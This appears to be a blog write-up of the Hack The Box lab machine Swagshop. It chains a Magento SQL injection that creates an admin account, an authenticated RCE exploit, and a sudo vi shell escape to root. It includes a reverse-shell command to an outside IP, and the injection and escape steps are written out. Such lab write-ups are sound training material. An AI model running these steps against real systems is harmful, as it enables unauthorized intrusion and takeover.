HTB: Swagshop
← Back to the log
September 30, 2026·Johnytiger

HTB: Swagshop

An unpatched Magento 1.9 storefront. A blind injection writes us our own admin account, an authenticated exploit turns those credentials into code execution, and sudo rights on vi hand over root through a shell escape.

securityctfwriteuphacktheboxlinuxwebsql injectionmagento

Our nmap scan shows this is a basic box. SSH and Apache, and the web server redirects to a swagshop.htb domain, so let's add that to our hosts file.

The nmap scan showing OpenSSH and Apache, with the web root redirecting to the swagshop.htb domain

Heading over to the site we can already see it's a Magento app, selling Hack The Box merch.

The Magento storefront for the swag shop, listing stickers and a logo t-shirt as new products

Version matters a lot with Magento, so let's run magescan against it.

php magescan.phar scan:all http://swagshop.htb

magescan reporting the installation as Magento Community edition, version 1.9.0.0

Version 1.9.0.0, which is ancient. Let's see what's public for it.

searchsploit magento

searchsploit listing several Magento entries, including an authenticated remote code execution for Community Edition below 1.9.0.1

Doing a little research we find a couple of things. There's a blind injection on this version, the Shoplift bug, that lets us create our own admin account outright. And separately there's an authenticated remote code execution. Those two chain together: the first gets us credentials, the second turns them into a shell.

Downloading the first exploit, all we have to do is point the target at the site's index path, since this install serves Magento from there rather than the web root.

The Shoplift exploit source in an editor, with the target variable set to the site's index path and the injected SQL that inserts a new admin user visible below

python2 37977.py

The exploit reporting that it worked, and printing the admin credentials it just created

That gets us an admin account we can work with. The injection inserts a row straight into the admin user table, so the account is real and fully privileged.

Now for the authenticated remote code execution. We just have to adjust it a bit and add the credentials we got from the previous step.

The RCE exploit source, showing the username, password and install date fields that need filling in

We also have to set the install date, and it has to match exactly. Looking back at the magescan output there's a readable configuration file left exposed.

The magescan path scan, flagging the Magento local configuration XML as reachable with a 200 response

That file has some juicy detail in it, including the install date the exploit needs. With that filled in we can fire it.

python3 37811.py http://swagshop.htb/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.10.14.211/443 0>&1'"

The RCE exploit building its tunnel and firing the payload, then timing out as the shell catches

The read timeout at the end is expected on a shell payload. We get execution as the web server user. Let's head over to the home directory and check the user's desktop.

cat /home/haris/user.txt

Reading user.txt in the haris home directory as the web server user, with the flag value blurred out

We get our user flag. Now let's head for privilege escalation. Running linPEAS on the machine shows what we can run with elevated rights.

sudo -l

The sudo rights for the web server user, allowing vi to run as root against anything under the web root

We can run vi as root against any file under the web root, with no password. Looking at GTFOBins, that's a straight break-out: vi can spawn a shell from inside itself, and since the editor is already running as root, so is the shell.

sudo /usr/bin/vi /var/www/html/index.php

Then inside the editor.

:!/bin/sh

The shell escape from inside vi, with whoami returning root

And we have root. Heading over to the root directory we can grab our root flag.

cat /root/root.txt

Reading root.txt in the root home directory, with the flag value blurred out

This was a pretty easy box. Had to do a little more research than usual but found everything pretty quick. Learned a bit about Magento, and not to use it when building an ecommerce store.

End of transmissionAll posts
Drive
Johnytiger